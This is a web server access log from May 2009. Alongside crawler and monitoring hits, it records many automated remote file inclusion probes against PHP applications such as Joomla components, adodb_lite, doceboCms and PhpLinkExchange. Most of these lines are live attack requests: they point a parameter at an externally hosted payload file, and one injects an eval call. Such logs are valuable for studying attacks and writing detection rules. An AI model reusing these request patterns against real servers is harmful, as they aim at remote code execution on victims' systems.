85.214.86.93 - - [16/May/2009:03:02:09 -0400] "GET /logs/access_log.Q109041200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:02:17 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.181.7.97 - - [16/May/2009:03:02:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.80.195.34 - - [16/May/2009:03:02:27 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
87.230.85.142 - - [16/May/2009:03:02:43 -0400] "GET /logs/access_log.Q109010100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.125.64.38 - - [16/May/2009:03:03:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.246.39.167 - - [16/May/2009:03:03:06 -0400] "GET /logs/access_log.Q109051200//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:03:03:12 -0400] "GET /logs/access_log.Q109010100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.184.52.8 - - [16/May/2009:03:03:18 -0400] "GET /logs/access_log.Q109010100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:03:36 -0400] "GET /logs/access_log.Q108082900//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:04:40 -0400] "GET /logs/access_log.Q109051200//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:04:51 -0400] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:04:51 -0400] "GET /logs/access_log.Q109030500%20%20//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:04:51 -0400] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:05:12 -0400] "GET /logs/access_log.Q108053100/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:03:05:38 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:03:05:38 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:03:05:38 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
84.112.140.135 - - [16/May/2009:03:05:46 -0400] "GET /zboard/view.php?id=artwork_notice&no=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
163.20.116.193 - - [16/May/2009:03:05:54 -0400] "GET /logs/access_log.Q108083100//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.26 - - [16/May/2009:03:06:04 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.26 - - [16/May/2009:03:06:04 -0400] "GET /logs/?sourcedir=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 200 1552 "-" "libwww-perl/5.805"
77.221.130.26 - - [16/May/2009:03:06:04 -0400] "GET /?sourcedir=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.130.26 - - [16/May/2009:03:06:05 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
87.230.85.142 - - [16/May/2009:03:06:14 -0400] "GET /logs/access_log.Q108122100//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:06:37 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:06:38 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:06:38 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:06:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.86.93 - - [16/May/2009:03:06:50 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:03:07:00 -0400] "GET /logs/access_log.Q109012300%20//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.813"
83.103.72.130 - - [16/May/2009:03:07:07 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
83.103.72.130 - - [16/May/2009:03:07:07 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
83.103.72.130 - - [16/May/2009:03:07:08 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
69.94.30.156 - - [16/May/2009:03:08:24 -0400] "GET /logs/access_log.Q108053100/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:03:08:28 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:08:40 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:08:46 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.221.130.26 - - [16/May/2009:03:09:15 -0400] "GET /logs/access_log.Q108062600%20/?sourcedir=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
58.227.193.198 - - [16/May/2009:03:09:29 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
79.188.187.18 - - [16/May/2009:03:09:36 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
79.188.187.18 - - [16/May/2009:03:09:37 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
79.188.187.18 - - [16/May/2009:03:09:39 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
193.25.197.14 - - [16/May/2009:03:09:58 -0400] "GET /logs/error_log.Q108081600%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:10:02 -0400] "GET /logs/error_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:03 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:03 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:04 -0400] "GET /logs/access_log.Q108082000%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:05 -0400] "GET /logs/access_log.Q108072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:08 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:09 -0400] "GET /logs/access_log.Q108082000//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:10 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.26 - - [16/May/2009:03:10:10 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
77.221.130.26 - - [16/May/2009:03:10:10 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
77.221.130.26 - - [16/May/2009:03:10:10 -0400] "GET /logs/error_log.Q109041500//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
72.52.230.168 - - [16/May/2009:03:10:11 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.72.114 - - [16/May/2009:03:10:19 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948401 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.52.230.168 - - [16/May/2009:03:10:26 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:26 -0400] "GET /logs/access_log.Q108102500//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:27 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:10:27 -0400] "GET /logs/access_log.Q108082000//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
79.188.187.18 - - [16/May/2009:03:10:44 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
79.188.187.18 - - [16/May/2009:03:10:45 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.227.193.198 - - [16/May/2009:03:11:25 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:11:25 -0400] "GET /logs/access_log.Q108082000//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:11:25 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:03:11:32 -0400] "GET /logs/error_log.Q108120400%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:11:34 -0400] "GET /logs/access_log.Q108072400//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:11:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [16/May/2009:03:11:59 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
116.50.163.164 - - [16/May/2009:03:12:02 -0400] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:12:02 -0400] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:12:02 -0400] "GET /logs/access_log.Q108100700//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:12:13 -0400] "GET /logs/access_log.Q108112400//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
58.227.193.198 - - [16/May/2009:03:12:24 -0400] "GET /logs/access_log.Q108082000%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:24 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:24 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:45 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:45 -0400] "GET /logs/access_log.Q108082000//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:45 -0400] "GET /logs/access_log.Q108102500//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:12:45 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:13:25 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:13:25 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:13:25 -0400] "GET /logs/access_log.Q108052500%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:03:13:33 -0400] "GET /logs/access_log.Q108022400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.230.168 - - [16/May/2009:03:13:36 -0400] "GET /logs/access_log.Q108120800%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:13:57 -0400] "GET /logs/error_log.Q108051600%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:13:57 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:13:57 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:13:57 -0400] "GET /logs/access_log.Q108082000%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.50.163.164 - - [16/May/2009:03:13:57 -0400] "GET /logs/access_log.Q108100700//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:13:57 -0400] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:13:57 -0400] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.50.163.164 - - [16/May/2009:03:13:57 -0400] "GET /logs/access_log.Q108112400//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
193.25.197.14 - - [16/May/2009:03:14:10 -0400] "GET /logs/error_log.Q108081600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:14:26 -0400] "GET /logs/error_log.Q108082000%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
212.227.114.171 - - [16/May/2009:03:14:37 -0400] "GET /logs/error_log.Q109021100/index.php?sayfa=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
212.227.114.171 - - [16/May/2009:03:14:37 -0400] "GET /index.php?sayfa=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
212.227.114.171 - - [16/May/2009:03:14:37 -0400] "GET /logs/index.php?sayfa=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
87.230.85.142 - - [16/May/2009:03:14:39 -0400] "GET /logs/access_log.Q108122100//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:15:21 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:15:21 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:15:21 -0400] "GET /logs/access_log.Q108082000//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:03:15:39 -0400] "GET /logs/error_log.Q108120400%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:15:41 -0400] "GET //skin/zero_vote/error.php?dir=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:15:41 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:15:41 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/error.php?dir=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:15:49 -0400] "GET /logs/access_log.Q108060200//doceboCms/class/class.dashboard_cms.php?where_framework=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.227.114.171 - - [16/May/2009:03:15:50 -0400] "GET /logs/error_log.Q108111600/index.php?sayfa=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
190.144.44.36 - - [16/May/2009:03:16:01 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:16:01 -0400] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:16:01 -0400] "GET /logs/access_log.Q108090200/s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.184.52.8 - - [16/May/2009:03:16:08 -0400] "GET /logs/access_log.Q108122100//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:16:28 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:16:28 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:16:28 -0400] "GET /logs/access_log.Q108052500%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.206.183.148 - - [16/May/2009:03:16:36 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.206.183.148 - - [16/May/2009:03:16:36 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.206.183.148 - - [16/May/2009:03:16:36 -0400] "GET /logs/access_log.Q108081700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:16:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [16/May/2009:03:16:50 -0400] "GET /logs/access_log.Q108082000//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
